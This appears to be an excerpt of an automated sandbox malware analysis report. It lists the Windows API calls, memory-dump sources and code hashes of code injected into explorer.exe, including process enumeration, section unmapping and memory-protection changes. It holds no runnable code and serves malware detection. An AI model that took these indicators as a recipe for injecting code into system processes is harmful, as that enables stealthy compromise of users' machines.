                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000001,?,00000000,006D11DD), ref: 006D26DB
                        • IsWow64Process.KERNEL32(000000FF,?), ref: 006D26ED
                        • IsWow64Process.KERNEL32(00000000,?), ref: 006D2700
                        • CloseHandle.KERNEL32(00000000), ref: 006D2716
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Process$Wow64$CloseHandleOpen
                        • String ID:
                        • API String ID: 331459951-0
                        • Opcode ID: 65a8d890ef7ee2c307396c038ff9e5a504e6b79ef77cc7e38030c9c56288d8ed
                        • Instruction ID: 3c7a4472c6a394c718a640995c2e18d616f289522ddc4a0fe061649e9dee513a
                        • Opcode Fuzzy Hash: 65a8d890ef7ee2c307396c038ff9e5a504e6b79ef77cc7e38030c9c56288d8ed
                        • Instruction Fuzzy Hash: 1EF05475D02229FF9B21CFA09D588EEB7BEEF05355B14126BE91493340D7314F4096B1
                        APIs
                          • Part of subcall function 006D2A09: GetProcessHeap.KERNEL32(00000008,0000A000,006D10BF), ref: 006D2A0C
                          • Part of subcall function 006D2A09: RtlAllocateHeap.NTDLL(00000000), ref: 006D2A13
                        • GetLocalTime.KERNEL32(?,00000000), ref: 006D17F3
                        • wsprintfW.USER32 ref: 006D181D
                        Strings
                        • [%02d.%02d.%d %02d:%02d:%02d], xrefs: 006D1817
                        Memory Dump Source
                        • Source File: 00000010.00000002.2941442870.00000000006D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 006D1000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_16_2_6d1000_explorer.jbxd
                        Similarity
                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                        • String ID: [%02d.%02d.%d %02d:%02d:%02d]
                        • API String ID: 377395780-613334611
                        • Opcode ID: f1a10a7120362e64a502e40b7d5d24def8e25bc1eebebd7b94039c52f4e9a6b1
                        • Instruction ID: ba4f0659a995e1ecbf58ed980fd8da33ce6bd06c94d97fe3fe8393f5797fba46
                        • Opcode Fuzzy Hash: f1a10a7120362e64a502e40b7d5d24def8e25bc1eebebd7b94039c52f4e9a6b1
                        • Instruction Fuzzy Hash: 3AF03066D00138BA87146BDA9D059FFB3FDEB0DB02B00019BFA41E1280E6785A90D3B5

                        Execution Graph

                        Execution Coverage:13%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:0%
                        Total number of Nodes:19
                        Total number of Limit Nodes:3
                        [execution graph rendering not reproduced; nodes reference LoadLibraryA and VirtualProtect calls at 0x43b595 and 0x43b5f0]

                        Callgraph

                        [call graph rendering not reproduced]

                        Control-flow Graph

                        [control-flow graph rendering not reproduced; function 0x43370c, contains NtUnmapViewOfSection call]
                        APIs
                        • NtUnmapViewOfSection.NTDLL ref: 0043378C
                        Memory Dump Source
                        • Source File: 00000011.00000002.2941114075.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_431000_explorer.jbxd
                        Similarity
                        • API ID: SectionUnmapView
                        • String ID:
                        • API String ID: 498011366-0
                        • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                        • Instruction ID: 1d1f43e4b5d59993d235f72522f3a47d77a97494e5c8479a36937122905a8525
                        • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                        • Instruction Fuzzy Hash: B011E6746019090BFB5CFBB9989D27633D1E71C312F14942FA815C73A2DE3D8A808308

                        Control-flow Graph

                        APIs
                          • Part of subcall function 00431BF8: OpenFileMappingA.KERNEL32 ref: 00431C0F
                          • Part of subcall function 00431BF8: MapViewOfFile.KERNELBASE ref: 00431C2E
                        • CreateToolhelp32Snapshot.KERNEL32 ref: 004335B7
                        • Process32First.KERNEL32 ref: 004335DA
                        • CharLowerA.USER32 ref: 004335EE
                        • lstrcmpi.KERNEL32 ref: 0043360C
                        • Process32Next.KERNEL32 ref: 004336CD
                        • FindCloseChangeNotification.KERNELBASE ref: 004336DE
                        • SysFreeMap.PGOCR ref: 004336F7
                        • SleepEx.KERNEL32 ref: 00433701
                        Memory Dump Source
                        • Source File: 00000011.00000002.2941114075.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_431000_explorer.jbxd
                        Similarity
                        • API ID: FileProcess32$ChangeCharCloseCreateFindFirstFreeLowerMappingNextNotificationOpenSleepSnapshotToolhelp32Viewlstrcmpi
                        • String ID:
                        • API String ID: 3414437237-0
                        • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                        • Instruction ID: 5382c61a7e1cf783e640c1d2b86c7ff6f24b88d73603cc446b73b9c85c58cf4d
                        • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                        • Instruction Fuzzy Hash: EE51A730208A089FDB19FF29D8596AA73E1EB98315F44561EE45BC32B1DF3CDA058785

                        Control-flow Graph

                        [control-flow graph rendering not reproduced; function 0x43b4a8, contains LoadLibraryA and VirtualProtect calls]
                        APIs
                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 0043B5A7
                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 0043B651
                        • VirtualProtect.KERNELBASE ref: 0043B66F
                        Memory Dump Source
                        • Source File: 00000011.00000002.2941114075.000000000043A000.00000040.80000000.00040000.00000000.sdmp, Offset: 0043A000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_43a000_explorer.jbxd
                        Similarity
                        • API ID: ProtectVirtual$LibraryLoad
                        • String ID:
                        • API String ID: 895956442-0
                        • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                        • Instruction ID: 71efbecba8c52c81b72467a4ae83a0e6644ce0e50a2de75b5ee4ad581bf2f792
                        • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                        • Instruction Fuzzy Hash: 9851683275491D5BDB24AA389C843F5B7C1F76D329F181A2BC69AC3385E75CC84683CA

                        Control-flow Graph

                        [control-flow graph rendering not reproduced; function 0x431bf8, contains OpenFileMappingA and MapViewOfFile calls]
                        APIs
                        Memory Dump Source
                        • Source File: 00000011.00000002.2941114075.0000000000431000.00000040.80000000.00040000.00000000.sdmp, Offset: 00431000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_17_2_431000_explorer.jbxd
                        Similarity
                        • API ID: File$MappingOpenView
                        • String ID:
                        • API String ID: 3439327939-0
                        • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                        • Instruction ID: d0f5accad40e85057e7fde6233c32180130f913bd182d681b1afd89b8571e67a
                        • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                        • Instruction Fuzzy Hash: 55F08234314F0D4FAB44EF7C9C9C136B7E0EBAC202B00897A984AC6264EF34C8408701